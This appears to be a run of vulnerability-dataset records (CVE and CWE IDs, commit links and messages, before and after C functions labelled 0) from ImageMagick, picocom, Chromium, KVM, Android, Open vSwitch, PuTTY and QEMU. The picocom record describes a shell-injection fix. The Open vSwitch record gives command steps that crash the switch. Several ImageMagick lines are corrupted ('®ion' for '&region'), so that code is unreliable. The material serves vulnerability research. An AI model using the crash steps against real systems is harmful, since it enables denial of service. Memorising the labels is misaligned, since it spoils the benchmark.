assert(clone_info != (CacheInfo *) NULL);
assert(exception != (ExceptionInfo *) NULL);
if (cache_info->type == PingCache)
return(MagickTrue);
length=cache_info->number_channels*sizeof(*cache_info->channel_map);
if ((cache_info->columns == clone_info->columns) &&
(cache_info->rows == clone_info->rows) &&
(cache_info->number_channels == clone_info->number_channels) &&
(memcmp(cache_info->channel_map,clone_info->channel_map,length) == 0) &&
(cache_info->metacontent_extent == clone_info->metacontent_extent))
{
/*
Identical pixel cache morphology.
*/
if (((cache_info->type == MemoryCache) ||
(cache_info->type == MapCache)) &&
((clone_info->type == MemoryCache) ||
(clone_info->type == MapCache)))
{
(void) memcpy(clone_info->pixels,cache_info->pixels,
cache_info->columns*cache_info->number_channels*cache_info->rows*
sizeof(*cache_info->pixels));
if ((cache_info->metacontent_extent != 0) &&
(clone_info->metacontent_extent != 0))
(void) memcpy(clone_info->metacontent,cache_info->metacontent,
cache_info->columns*cache_info->rows*
clone_info->metacontent_extent*sizeof(unsigned char));
return(MagickTrue);
}
if ((cache_info->type == DiskCache) && (clone_info->type == DiskCache))
return(ClonePixelCacheOnDisk(cache_info,clone_info));
}
/*
Mismatched pixel cache morphology.
*/
cache_nexus=AcquirePixelCacheNexus(MaxCacheThreads);
clone_nexus=AcquirePixelCacheNexus(MaxCacheThreads);
if ((cache_nexus == (NexusInfo **) NULL) ||
(clone_nexus == (NexusInfo **) NULL))
ThrowFatalException(ResourceLimitFatalError,"MemoryAllocationFailed");
length=cache_info->number_channels*sizeof(*cache_info->channel_map);
optimize=(cache_info->number_channels == clone_info->number_channels) &&
(memcmp(cache_info->channel_map,clone_info->channel_map,length) == 0) ?
MagickTrue : MagickFalse;
length=(size_t) MagickMin(cache_info->columns*cache_info->number_channels,
clone_info->columns*clone_info->number_channels);
status=MagickTrue;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static,4) shared(status) \
cache_threads(cache_info,clone_info)
#endif
for (y=0; y < (ssize_t) cache_info->rows; y++)
{
const int
id = GetOpenMPThreadId();
Quantum
*pixels;
RectangleInfo
region;
register ssize_t
x;
if (status == MagickFalse)
continue;
if (y >= (ssize_t) clone_info->rows)
continue;
region.width=cache_info->columns;
region.height=1;
region.x=0;
region.y=y;
pixels=SetPixelCacheNexusPixels(cache_info,ReadMode,®ion,
cache_nexus[id],exception);
if (pixels == (Quantum *) NULL)
continue;
status=ReadPixelCachePixels(cache_info,cache_nexus[id],exception);
if (status == MagickFalse)
continue;
region.width=clone_info->columns;
pixels=SetPixelCacheNexusPixels(clone_info,WriteMode,®ion,
clone_nexus[id],exception);
if (pixels == (Quantum *) NULL)
continue;
(void) ResetMagickMemory(clone_nexus[id]->pixels,0,(size_t)
clone_nexus[id]->length);
if (optimize != MagickFalse)
(void) memcpy(clone_nexus[id]->pixels,cache_nexus[id]->pixels,length*
sizeof(Quantum));
else
{
register const Quantum
*magick_restrict p;
register Quantum
*magick_restrict q;
/*
Mismatched pixel channel map.
*/
p=cache_nexus[id]->pixels;
q=clone_nexus[id]->pixels;
for (x=0; x < (ssize_t) cache_info->columns; x++)
{
register ssize_t
i;
if (x == (ssize_t) clone_info->columns)
break;
for (i=0; i < (ssize_t) clone_info->number_channels; i++)
{
PixelChannel
channel;
PixelTrait
traits;
channel=clone_info->channel_map[i].channel;
traits=cache_info->channel_map[channel].traits;
if (traits != UndefinedPixelTrait)
*q=*(p+cache_info->channel_map[channel].offset);
q++;
}
p+=cache_info->number_channels;
}
}
status=WritePixelCachePixels(clone_info,clone_nexus[id],exception);
}
if ((cache_info->metacontent_extent != 0) &&
(clone_info->metacontent_extent != 0))
{
/*
Clone metacontent.
*/
length=(size_t) MagickMin(cache_info->metacontent_extent,
clone_info->metacontent_extent);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static,4) shared(status) \
cache_threads(cache_info,clone_info)
#endif
for (y=0; y < (ssize_t) cache_info->rows; y++)
{
const int
id = GetOpenMPThreadId();
Quantum
*pixels;
RectangleInfo
region;
if (status == MagickFalse)
continue;
if (y >= (ssize_t) clone_info->rows)
continue;
region.width=cache_info->columns;
region.height=1;
region.x=0;
region.y=y;
pixels=SetPixelCacheNexusPixels(cache_info,ReadMode,®ion,
cache_nexus[id],exception);
if (pixels == (Quantum *) NULL)
continue;
status=ReadPixelCacheMetacontent(cache_info,cache_nexus[id],exception);
if (status == MagickFalse)
continue;
region.width=clone_info->columns;
pixels=SetPixelCacheNexusPixels(clone_info,WriteMode,®ion,
clone_nexus[id],exception);
if (pixels == (Quantum *) NULL)
continue;
if ((clone_nexus[id]->metacontent != (void *) NULL) &&
(cache_nexus[id]->metacontent != (void *) NULL))
(void) memcpy(clone_nexus[id]->metacontent,
cache_nexus[id]->metacontent,length*sizeof(unsigned char));
status=WritePixelCacheMetacontent(clone_info,clone_nexus[id],exception);
}
}
cache_nexus=DestroyPixelCacheNexus(cache_nexus,MaxCacheThreads);
clone_nexus=DestroyPixelCacheNexus(clone_nexus,MaxCacheThreads);
if (cache_info->debug != MagickFalse)
{
char
message[MagickPathExtent];
(void) FormatLocaleString(message,MagickPathExtent,"%s => %s",
CommandOptionToMnemonic(MagickCacheOptions,(ssize_t) cache_info->type),
CommandOptionToMnemonic(MagickCacheOptions,(ssize_t) clone_info->type));
(void) LogMagickEvent(CacheEvent,GetMagickModule(),"%s",message);
}
return(status);
}
|
static MagickBooleanType ClonePixelCacheRepository(
CacheInfo *magick_restrict clone_info,CacheInfo *magick_restrict cache_info,
ExceptionInfo *exception)
{
#define MaxCacheThreads 2
#define cache_threads(source,destination) \
num_threads(((source)->type == DiskCache) || \
((destination)->type == DiskCache) || (((source)->rows) < \
(16*GetMagickResourceLimit(ThreadResource))) ? 1 : \
GetMagickResourceLimit(ThreadResource) < MaxCacheThreads ? \
GetMagickResourceLimit(ThreadResource) : MaxCacheThreads)
MagickBooleanType
optimize,
status;
NexusInfo
**magick_restrict cache_nexus,
**magick_restrict clone_nexus;
size_t
length;
ssize_t
y;
assert(cache_info != (CacheInfo *) NULL);
assert(clone_info != (CacheInfo *) NULL);
assert(exception != (ExceptionInfo *) NULL);
if (cache_info->type == PingCache)
return(MagickTrue);
length=cache_info->number_channels*sizeof(*cache_info->channel_map);
if ((cache_info->columns == clone_info->columns) &&
(cache_info->rows == clone_info->rows) &&
(cache_info->number_channels == clone_info->number_channels) &&
(memcmp(cache_info->channel_map,clone_info->channel_map,length) == 0) &&
(cache_info->metacontent_extent == clone_info->metacontent_extent))
{
/*
Identical pixel cache morphology.
*/
if (((cache_info->type == MemoryCache) ||
(cache_info->type == MapCache)) &&
((clone_info->type == MemoryCache) ||
(clone_info->type == MapCache)))
{
(void) memcpy(clone_info->pixels,cache_info->pixels,
cache_info->columns*cache_info->number_channels*cache_info->rows*
sizeof(*cache_info->pixels));
if ((cache_info->metacontent_extent != 0) &&
(clone_info->metacontent_extent != 0))
(void) memcpy(clone_info->metacontent,cache_info->metacontent,
cache_info->columns*cache_info->rows*
clone_info->metacontent_extent*sizeof(unsigned char));
return(MagickTrue);
}
if ((cache_info->type == DiskCache) && (clone_info->type == DiskCache))
return(ClonePixelCacheOnDisk(cache_info,clone_info));
}
/*
Mismatched pixel cache morphology.
*/
cache_nexus=AcquirePixelCacheNexus(MaxCacheThreads);
clone_nexus=AcquirePixelCacheNexus(MaxCacheThreads);
if ((cache_nexus == (NexusInfo **) NULL) ||
(clone_nexus == (NexusInfo **) NULL))
ThrowFatalException(ResourceLimitFatalError,"MemoryAllocationFailed");
length=cache_info->number_channels*sizeof(*cache_info->channel_map);
optimize=(cache_info->number_channels == clone_info->number_channels) &&
(memcmp(cache_info->channel_map,clone_info->channel_map,length) == 0) ?
MagickTrue : MagickFalse;
length=(size_t) MagickMin(cache_info->columns*cache_info->number_channels,
clone_info->columns*clone_info->number_channels);
status=MagickTrue;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static,4) shared(status) \
cache_threads(cache_info,clone_info)
#endif
for (y=0; y < (ssize_t) cache_info->rows; y++)
{
const int
id = GetOpenMPThreadId();
Quantum
*pixels;
RectangleInfo
region;
register ssize_t
x;
if (status == MagickFalse)
continue;
if (y >= (ssize_t) clone_info->rows)
continue;
region.width=cache_info->columns;
region.height=1;
region.x=0;
region.y=y;
pixels=SetPixelCacheNexusPixels(cache_info,ReadMode,®ion,
cache_nexus[id],exception);
if (pixels == (Quantum *) NULL)
continue;
status=ReadPixelCachePixels(cache_info,cache_nexus[id],exception);
if (status == MagickFalse)
continue;
region.width=clone_info->columns;
pixels=SetPixelCacheNexusPixels(clone_info,WriteMode,®ion,
clone_nexus[id],exception);
if (pixels == (Quantum *) NULL)
continue;
(void) ResetMagickMemory(clone_nexus[id]->pixels,0,(size_t)
clone_nexus[id]->length);
if (optimize != MagickFalse)
(void) memcpy(clone_nexus[id]->pixels,cache_nexus[id]->pixels,length*
sizeof(Quantum));
else
{
register const Quantum
*magick_restrict p;
register Quantum
*magick_restrict q;
/*
Mismatched pixel channel map.
*/
p=cache_nexus[id]->pixels;
q=clone_nexus[id]->pixels;
for (x=0; x < (ssize_t) cache_info->columns; x++)
{
register ssize_t
i;
if (x == (ssize_t) clone_info->columns)
break;
for (i=0; i < (ssize_t) clone_info->number_channels; i++)
{
PixelChannel
channel;
PixelTrait
traits;
channel=clone_info->channel_map[i].channel;
traits=cache_info->channel_map[channel].traits;
if (traits != UndefinedPixelTrait)
*q=*(p+cache_info->channel_map[channel].offset);
q++;
}
p+=cache_info->number_channels;
}
}
status=WritePixelCachePixels(clone_info,clone_nexus[id],exception);
}
if ((cache_info->metacontent_extent != 0) &&
(clone_info->metacontent_extent != 0))
{
/*
Clone metacontent.
*/
length=(size_t) MagickMin(cache_info->metacontent_extent,
clone_info->metacontent_extent);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static,4) shared(status) \
cache_threads(cache_info,clone_info)
#endif
for (y=0; y < (ssize_t) cache_info->rows; y++)
{
const int
id = GetOpenMPThreadId();
Quantum
*pixels;
RectangleInfo
region;
if (status == MagickFalse)
continue;
if (y >= (ssize_t) clone_info->rows)
continue;
region.width=cache_info->columns;
region.height=1;
region.x=0;
region.y=y;
pixels=SetPixelCacheNexusPixels(cache_info,ReadMode,®ion,
cache_nexus[id],exception);
if (pixels == (Quantum *) NULL)
continue;
status=ReadPixelCacheMetacontent(cache_info,cache_nexus[id],exception);
if (status == MagickFalse)
continue;
region.width=clone_info->columns;
pixels=SetPixelCacheNexusPixels(clone_info,WriteMode,®ion,
clone_nexus[id],exception);
if (pixels == (Quantum *) NULL)
continue;
if ((clone_nexus[id]->metacontent != (void *) NULL) &&
(cache_nexus[id]->metacontent != (void *) NULL))
(void) memcpy(clone_nexus[id]->metacontent,
cache_nexus[id]->metacontent,length*sizeof(unsigned char));
status=WritePixelCacheMetacontent(clone_info,clone_nexus[id],exception);
}
}
cache_nexus=DestroyPixelCacheNexus(cache_nexus,MaxCacheThreads);
clone_nexus=DestroyPixelCacheNexus(clone_nexus,MaxCacheThreads);
if (cache_info->debug != MagickFalse)
{
char
message[MagickPathExtent];
(void) FormatLocaleString(message,MagickPathExtent,"%s => %s",
CommandOptionToMnemonic(MagickCacheOptions,(ssize_t) cache_info->type),
CommandOptionToMnemonic(MagickCacheOptions,(ssize_t) clone_info->type));
(void) LogMagickEvent(CacheEvent,GetMagickModule(),"%s",message);
}
return(status);
}
|
C
|
ImageMagick
| 0 |
CVE-2015-9059
|
https://www.cvedetails.com/cve/CVE-2015-9059/
|
CWE-77
|
https://github.com/npat-efault/picocom/commit/1ebc60b20fbe9a02436d5cbbf8951714e749ddb1
|
1ebc60b20fbe9a02436d5cbbf8951714e749ddb1
|
Do not use "/bin/sh" to run external commands.
Picocom no longer uses /bin/sh to run external commands for
file-transfer operations. Parsing the command line and spliting it into
arguments is now performed internally by picocom, using quoting rules
very similar to those of the Unix shell. Hopefully, this makes it
impossible to inject shell-commands when supplying filenames or
extra arguments to the send- and receive-file commands.
|
main(int argc, char *argv[])
{
int r;
parse_args(argc, argv);
establish_signal_handlers();
r = term_lib_init();
if ( r < 0 )
fatal("term_init failed: %s", term_strerror(term_errno, errno));
#ifdef UUCP_LOCK_DIR
if ( ! opts.nolock ) uucp_lockname(UUCP_LOCK_DIR, opts.port);
if ( uucp_lock() < 0 )
fatal("cannot lock %s: %s", opts.port, strerror(errno));
#endif
tty_fd = open(opts.port, O_RDWR | O_NONBLOCK | O_NOCTTY);
if (tty_fd < 0)
fatal("cannot open %s: %s", opts.port, strerror(errno));
#ifdef USE_FLOCK
if ( ! opts.nolock ) {
r = flock(tty_fd, LOCK_EX | LOCK_NB);
if ( r < 0 )
fatal("cannot lock %s: %s", opts.port, strerror(errno));
}
#endif
if ( opts.noinit ) {
r = term_add(tty_fd);
} else {
r = term_set(tty_fd,
1, /* raw mode. */
opts.baud, /* baud rate. */
opts.parity, /* parity. */
opts.databits, /* data bits. */
opts.flow, /* flow control. */
1, /* local or modem */
!opts.noreset); /* hup-on-close. */
}
if ( r < 0 )
fatal("failed to add device %s: %s",
opts.port, term_strerror(term_errno, errno));
r = term_apply(tty_fd);
if ( r < 0 )
fatal("failed to config device %s: %s",
opts.port, term_strerror(term_errno, errno));
set_tty_write_sz(term_get_baudrate(tty_fd, NULL));
r = term_add(STI);
if ( r < 0 )
fatal("failed to add I/O device: %s",
term_strerror(term_errno, errno));
term_set_raw(STI);
r = term_apply(STI);
if ( r < 0 )
fatal("failed to set I/O device to raw mode: %s",
term_strerror(term_errno, errno));
#ifdef LINENOISE
init_send_receive_history();
#endif
fd_printf(STO, "Terminal ready\r\n");
loop();
#ifdef LINENOISE
cleanup_send_receive_history();
#endif
fd_printf(STO, "\r\n");
if ( opts.noreset ) {
fd_printf(STO, "Skipping tty reset...\r\n");
term_erase(tty_fd);
}
if ( sig_exit )
fd_printf(STO, "Picocom was killed\r\n");
else
fd_printf(STO, "Thanks for using picocom\r\n");
/* wait a bit for output to drain */
sleep(1);
#ifdef UUCP_LOCK_DIR
uucp_unlock();
#endif
return EXIT_SUCCESS;
}
|
main(int argc, char *argv[])
{
int r;
parse_args(argc, argv);
establish_signal_handlers();
r = term_lib_init();
if ( r < 0 )
fatal("term_init failed: %s", term_strerror(term_errno, errno));
#ifdef UUCP_LOCK_DIR
if ( ! opts.nolock ) uucp_lockname(UUCP_LOCK_DIR, opts.port);
if ( uucp_lock() < 0 )
fatal("cannot lock %s: %s", opts.port, strerror(errno));
#endif
tty_fd = open(opts.port, O_RDWR | O_NONBLOCK | O_NOCTTY);
if (tty_fd < 0)
fatal("cannot open %s: %s", opts.port, strerror(errno));
#ifdef USE_FLOCK
if ( ! opts.nolock ) {
r = flock(tty_fd, LOCK_EX | LOCK_NB);
if ( r < 0 )
fatal("cannot lock %s: %s", opts.port, strerror(errno));
}
#endif
if ( opts.noinit ) {
r = term_add(tty_fd);
} else {
r = term_set(tty_fd,
1, /* raw mode. */
opts.baud, /* baud rate. */
opts.parity, /* parity. */
opts.databits, /* data bits. */
opts.flow, /* flow control. */
1, /* local or modem */
!opts.noreset); /* hup-on-close. */
}
if ( r < 0 )
fatal("failed to add device %s: %s",
opts.port, term_strerror(term_errno, errno));
r = term_apply(tty_fd);
if ( r < 0 )
fatal("failed to config device %s: %s",
opts.port, term_strerror(term_errno, errno));
set_tty_write_sz(term_get_baudrate(tty_fd, NULL));
r = term_add(STI);
if ( r < 0 )
fatal("failed to add I/O device: %s",
term_strerror(term_errno, errno));
term_set_raw(STI);
r = term_apply(STI);
if ( r < 0 )
fatal("failed to set I/O device to raw mode: %s",
term_strerror(term_errno, errno));
#ifdef LINENOISE
init_send_receive_history();
#endif
fd_printf(STO, "Terminal ready\r\n");
loop();
#ifdef LINENOISE
cleanup_send_receive_history();
#endif
fd_printf(STO, "\r\n");
if ( opts.noreset ) {
fd_printf(STO, "Skipping tty reset...\r\n");
term_erase(tty_fd);
}
if ( sig_exit )
fd_printf(STO, "Picocom was killed\r\n");
else
fd_printf(STO, "Thanks for using picocom\r\n");
/* wait a bit for output to drain */
sleep(1);
#ifdef UUCP_LOCK_DIR
uucp_unlock();
#endif
return EXIT_SUCCESS;
}
|
C
|
picocom
| 0 |
null | null | null |
https://github.com/chromium/chromium/commit/59f5e0204cbc0e524b2687fb1beddda82047d16d
|
59f5e0204cbc0e524b2687fb1beddda82047d16d
|
AutoFill: Record whether the user initiated the form submission and don't save form data if the form was not user-submitted.
BUG=48225
TEST=none
Review URL: http://codereview.chromium.org/2842062
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@53350 0039d316-1c4b-4281-b951-d872f2087c98
|
AutoFillManager::AutoFillManager(TabContents* tab_contents,
PersonalDataManager* personal_data)
: tab_contents_(tab_contents),
personal_data_(personal_data),
download_manager_(NULL) {
DCHECK(tab_contents);
}
|
AutoFillManager::AutoFillManager(TabContents* tab_contents,
PersonalDataManager* personal_data)
: tab_contents_(tab_contents),
personal_data_(personal_data),
download_manager_(NULL) {
DCHECK(tab_contents);
}
|
C
|
Chrome
| 0 |
CVE-2012-1601
|
https://www.cvedetails.com/cve/CVE-2012-1601/
|
CWE-399
|
https://github.com/torvalds/linux/commit/9c895160d25a76c21b65bad141b08e8d4f99afef
|
9c895160d25a76c21b65bad141b08e8d4f99afef
|
KVM: Ensure all vcpus are consistent with in-kernel irqchip settings
(cherry picked from commit 3e515705a1f46beb1c942bb8043c16f8ac7b1e9e)
If some vcpus are created before KVM_CREATE_IRQCHIP, then
irqchip_in_kernel() and vcpu->arch.apic will be inconsistent, leading
to potential NULL pointer dereferences.
Fix by:
- ensuring that no vcpus are installed when KVM_CREATE_IRQCHIP is called
- ensuring that a vcpu has an apic if it is installed after KVM_CREATE_IRQCHIP
This is somewhat long winded because vcpu->arch.apic is created without
kvm->lock held.
Based on earlier patch by Michael Ellerman.
Signed-off-by: Michael Ellerman <michael@ellerman.id.au>
Signed-off-by: Avi Kivity <avi@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
|
static void kvm_set_mmio_spte_mask(void)
{
u64 mask;
int maxphyaddr = boot_cpu_data.x86_phys_bits;
/*
* Set the reserved bits and the present bit of an paging-structure
* entry to generate page fault with PFER.RSV = 1.
*/
mask = ((1ull << (62 - maxphyaddr + 1)) - 1) << maxphyaddr;
mask |= 1ull;
#ifdef CONFIG_X86_64
/*
* If reserved bit is not supported, clear the present bit to disable
* mmio page fault.
*/
if (maxphyaddr == 52)
mask &= ~1ull;
#endif
kvm_mmu_set_mmio_spte_mask(mask);
}
|
static void kvm_set_mmio_spte_mask(void)
{
u64 mask;
int maxphyaddr = boot_cpu_data.x86_phys_bits;
/*
* Set the reserved bits and the present bit of an paging-structure
* entry to generate page fault with PFER.RSV = 1.
*/
mask = ((1ull << (62 - maxphyaddr + 1)) - 1) << maxphyaddr;
mask |= 1ull;
#ifdef CONFIG_X86_64
/*
* If reserved bit is not supported, clear the present bit to disable
* mmio page fault.
*/
if (maxphyaddr == 52)
mask &= ~1ull;
#endif
kvm_mmu_set_mmio_spte_mask(mask);
}
|
C
|
linux
| 0 |
CVE-2016-3861
|
https://www.cvedetails.com/cve/CVE-2016-3861/
|
CWE-119
|
https://android.googlesource.com/platform/frameworks/native/+/1f4b49e64adf4623eefda503bca61e253597b9bf
|
1f4b49e64adf4623eefda503bca61e253597b9bf
|
Add bound checks to utf16_to_utf8
Bug: 29250543
Change-Id: I518e7b2fe10aaa3f1c1987586a09b1110aff7e1a
(cherry picked from commit 7e93b2ddcb49b5365fbe1dab134ffb38e6f1c719)
|
status_t Parcel::writeStrongBinderVector(const std::vector<sp<IBinder>>& val)
{
return writeTypedVector(val, &Parcel::writeStrongBinder);
}
|
status_t Parcel::writeStrongBinderVector(const std::vector<sp<IBinder>>& val)
{
return writeTypedVector(val, &Parcel::writeStrongBinder);
}
|
C
|
Android
| 0 |
CVE-2017-5008
|
https://www.cvedetails.com/cve/CVE-2017-5008/
|
CWE-79
|
https://github.com/chromium/chromium/commit/c093b7a74ddce32dd3b0e0be60f31becc6ce32f9
|
c093b7a74ddce32dd3b0e0be60f31becc6ce32f9
|
Don't touch the prototype chain to get the private script controller.
Prior to this patch, private scripts attempted to get the
"privateScriptController" property off the global object without verifying if
the property actually exists on the global. If the property hasn't been set yet,
this operation could descend into the prototype chain and potentially return
a named property from the WindowProperties object, leading to release asserts
and general confusion.
BUG=668552
Review-Url: https://codereview.chromium.org/2529163002
Cr-Commit-Position: refs/heads/master@{#434627}
|
v8::Local<v8::Value> PrivateScriptRunner::runDOMMethod(
ScriptState* scriptState,
ScriptState* scriptStateInUserScript,
const char* className,
const char* methodName,
v8::Local<v8::Value> holder,
int argc,
v8::Local<v8::Value> argv[]) {
v8::Local<v8::Object> classObject =
classObjectOfPrivateScript(scriptState, className);
v8::Local<v8::Value> method;
if (!classObject
->Get(scriptState->context(),
v8String(scriptState->isolate(), methodName))
.ToLocal(&method) ||
!method->IsFunction()) {
LOG(FATAL)
<< "Private script error: Target DOM method was not found. (Class "
"name = "
<< className << ", Method name = " << methodName << ")";
}
initializeHolderIfNeeded(scriptState, classObject, holder);
v8::TryCatch block(scriptState->isolate());
v8::Local<v8::Value> result;
if (!V8ScriptRunner::callInternalFunction(
v8::Local<v8::Function>::Cast(method), holder, argc, argv,
scriptState->isolate())
.ToLocal(&result)) {
rethrowExceptionInPrivateScript(
scriptState->isolate(), block, scriptStateInUserScript,
ExceptionState::ExecutionContext, methodName, className);
block.ReThrow();
return v8::Local<v8::Value>();
}
return result;
}
|
v8::Local<v8::Value> PrivateScriptRunner::runDOMMethod(
ScriptState* scriptState,
ScriptState* scriptStateInUserScript,
const char* className,
const char* methodName,
v8::Local<v8::Value> holder,
int argc,
v8::Local<v8::Value> argv[]) {
v8::Local<v8::Object> classObject =
classObjectOfPrivateScript(scriptState, className);
v8::Local<v8::Value> method;
if (!classObject
->Get(scriptState->context(),
v8String(scriptState->isolate(), methodName))
.ToLocal(&method) ||
!method->IsFunction()) {
LOG(FATAL)
<< "Private script error: Target DOM method was not found. (Class "
"name = "
<< className << ", Method name = " << methodName << ")";
}
initializeHolderIfNeeded(scriptState, classObject, holder);
v8::TryCatch block(scriptState->isolate());
v8::Local<v8::Value> result;
if (!V8ScriptRunner::callInternalFunction(
v8::Local<v8::Function>::Cast(method), holder, argc, argv,
scriptState->isolate())
.ToLocal(&result)) {
rethrowExceptionInPrivateScript(
scriptState->isolate(), block, scriptStateInUserScript,
ExceptionState::ExecutionContext, methodName, className);
block.ReThrow();
return v8::Local<v8::Value>();
}
return result;
}
|
C
|
Chrome
| 0 |
CVE-2018-17205
|
https://www.cvedetails.com/cve/CVE-2018-17205/
|
CWE-617
|
https://github.com/openvswitch/ovs/commit/0befd1f3745055c32940f5faf9559be6a14395e6
|
0befd1f3745055c32940f5faf9559be6a14395e6
|
ofproto: Fix OVS crash when reverting old flows in bundle commit
During bundle commit flows which are added in bundle are applied
to ofproto in-order. In case if a flow cannot be added (e.g. flow
action is go-to group id which does not exist), OVS tries to
revert back all previous flows which were successfully applied
from the same bundle. This is possible since OVS maintains list
of old flows which were replaced by flows from the bundle.
While reinserting old flows ovs asserts due to check on rule
state != RULE_INITIALIZED. This will work only for new flows, but
for old flow the rule state will be RULE_REMOVED. This is causing
an assert and OVS crash.
The ovs assert check should be modified to != RULE_INSERTED to prevent
any existing rule being re-inserted and allow new rules and old rules
(in case of revert) to get inserted.
Here is an example to trigger the assert:
$ ovs-vsctl add-br br-test -- set Bridge br-test datapath_type=netdev
$ cat flows.txt
flow add table=1,priority=0,in_port=2,actions=NORMAL
flow add table=1,priority=0,in_port=3,actions=NORMAL
$ ovs-ofctl dump-flows -OOpenflow13 br-test
cookie=0x0, duration=2.465s, table=1, n_packets=0, n_bytes=0, priority=0,in_port=2 actions=NORMAL
cookie=0x0, duration=2.465s, table=1, n_packets=0, n_bytes=0, priority=0,in_port=3 actions=NORMAL
$ cat flow-modify.txt
flow modify table=1,priority=0,in_port=2,actions=drop
flow modify table=1,priority=0,in_port=3,actions=group:10
$ ovs-ofctl bundle br-test flow-modify.txt -OOpenflow13
First flow rule will be modified since it is a valid rule. However second
rule is invalid since no group with id 10 exists. Bundle commit tries to
revert (insert) the first rule to old flow which results in ovs_assert at
ofproto_rule_insert__() since old rule->state = RULE_REMOVED.
Signed-off-by: Vishal Deep Ajmera <vishal.deep.ajmera@ericsson.com>
Signed-off-by: Ben Pfaff <blp@ovn.org>
|
replace_rule_revert(struct ofproto *ofproto,
struct rule *old_rule, struct rule *new_rule)
{
struct oftable *table = &ofproto->tables[new_rule->table_id];
if (old_rule) {
if (old_rule->removed_reason == OFPRR_EVICTION) {
/* Revert the eviction. */
eviction_group_add_rule(old_rule);
}
/* Restore the old rule to data structures. */
ofproto_rule_insert__(ofproto, old_rule);
/* Restore the original visibility of the old rule. */
cls_rule_restore_visibility(&old_rule->cr);
} else {
/* Restore table's rule count. */
table->n_flows--;
}
/* Remove the new rule immediately. It was never visible to lookups. */
if (!classifier_remove(&table->cls, &new_rule->cr)) {
OVS_NOT_REACHED();
}
ofproto_rule_remove__(ofproto, new_rule);
ofproto_rule_unref(new_rule);
}
|
replace_rule_revert(struct ofproto *ofproto,
struct rule *old_rule, struct rule *new_rule)
{
struct oftable *table = &ofproto->tables[new_rule->table_id];
if (old_rule) {
if (old_rule->removed_reason == OFPRR_EVICTION) {
/* Revert the eviction. */
eviction_group_add_rule(old_rule);
}
/* Restore the old rule to data structures. */
ofproto_rule_insert__(ofproto, old_rule);
/* Restore the original visibility of the old rule. */
cls_rule_restore_visibility(&old_rule->cr);
} else {
/* Restore table's rule count. */
table->n_flows--;
}
/* Remove the new rule immediately. It was never visible to lookups. */
if (!classifier_remove(&table->cls, &new_rule->cr)) {
OVS_NOT_REACHED();
}
ofproto_rule_remove__(ofproto, new_rule);
ofproto_rule_unref(new_rule);
}
|
C
|
ovs
| 0 |
null | null | null |
https://github.com/chromium/chromium/commit/aa0e1ed74972a619072341b6409dc5cacd2418aa
|
aa0e1ed74972a619072341b6409dc5cacd2418aa
|
[BlackBerry] willComposite() and didComposite() are now in InspectorController
https://bugs.webkit.org/show_bug.cgi?id=110343
Patch by Alberto Garcia <albgarcia@rim.com> on 2013-02-21
Reviewed by Carlos Garcia Campos.
This was changed in r142879.
* Api/WebPage.cpp:
(BlackBerry::WebKit::WebPagePrivate::willComposite):
(BlackBerry::WebKit::WebPagePrivate::didComposite):
git-svn-id: svn://svn.chromium.org/blink/trunk@143584 bbb929c8-8fbe-4397-9dbb-9b2b20218538
|
void WebPagePrivate::enterFullScreenForElement(Element* element)
{
#if ENABLE(VIDEO)
if (!element)
return;
if (m_webSettings->fullScreenVideoCapable() && element->hasTagName(HTMLNames::videoTag)) {
enterFullscreenForNode(element);
} else {
if (transformedActualVisibleSize() != transformedViewportSize()) {
m_scaleBeforeFullScreen = currentScale();
m_scrollPositionBeforeFullScreen = m_mainFrame->view()->scrollPosition();
m_orientationBeforeFullScreen = orientation();
}
client()->fullscreenStart();
m_fullscreenNode = element;
}
#endif
}
|
void WebPagePrivate::enterFullScreenForElement(Element* element)
{
#if ENABLE(VIDEO)
if (!element)
return;
if (m_webSettings->fullScreenVideoCapable() && element->hasTagName(HTMLNames::videoTag)) {
enterFullscreenForNode(element);
} else {
if (transformedActualVisibleSize() != transformedViewportSize()) {
m_scaleBeforeFullScreen = currentScale();
m_scrollPositionBeforeFullScreen = m_mainFrame->view()->scrollPosition();
m_orientationBeforeFullScreen = orientation();
}
client()->fullscreenStart();
m_fullscreenNode = element;
}
#endif
}
|
C
|
Chrome
| 0 |
CVE-2017-6542
|
https://www.cvedetails.com/cve/CVE-2017-6542/
|
CWE-119
|
https://git.tartarus.org/?p=simon/putty.git;a=commitdiff;h=4ff22863d895cb7ebfced4cf923a012a614adaa8
|
4ff22863d895cb7ebfced4cf923a012a614adaa8
| null |
static void logeventf(Ssh ssh, const char *fmt, ...)
{
va_list ap;
char *buf;
va_start(ap, fmt);
buf = dupvprintf(fmt, ap);
va_end(ap);
logevent(buf);
sfree(buf);
}
|
static void logeventf(Ssh ssh, const char *fmt, ...)
{
va_list ap;
char *buf;
va_start(ap, fmt);
buf = dupvprintf(fmt, ap);
va_end(ap);
logevent(buf);
sfree(buf);
}
|
C
|
tartarus
| 0 |
CVE-2016-5126
|
https://www.cvedetails.com/cve/CVE-2016-5126/
|
CWE-119
|
https://git.qemu.org/?p=qemu.git;a=commit;h=a6b3167fa0e825aebb5a7cd8b437b6d41584a196
|
a6b3167fa0e825aebb5a7cd8b437b6d41584a196
| null |
static void iscsi_close(BlockDriverState *bs)
{
IscsiLun *iscsilun = bs->opaque;
struct iscsi_context *iscsi = iscsilun->iscsi;
iscsi_detach_aio_context(bs);
if (iscsi_is_logged_in(iscsi)) {
iscsi_logout_sync(iscsi);
}
iscsi_destroy_context(iscsi);
g_free(iscsilun->zeroblock);
g_free(iscsilun->allocationmap);
memset(iscsilun, 0, sizeof(IscsiLun));
}
|
static void iscsi_close(BlockDriverState *bs)
{
IscsiLun *iscsilun = bs->opaque;
struct iscsi_context *iscsi = iscsilun->iscsi;
iscsi_detach_aio_context(bs);
if (iscsi_is_logged_in(iscsi)) {
iscsi_logout_sync(iscsi);
}
iscsi_destroy_context(iscsi);
g_free(iscsilun->zeroblock);
g_free(iscsilun->allocationmap);
memset(iscsilun, 0, sizeof(IscsiLun));
}
|
C
|
qemu
| 0 |
CVE-2016-2476
|
https://www.cvedetails.com/cve/CVE-2016-2476/
|
CWE-119
|
https://android.googlesource.com/platform/frameworks/av/+/295c883fe3105b19bcd0f9e07d54c6b589fc5bff
|
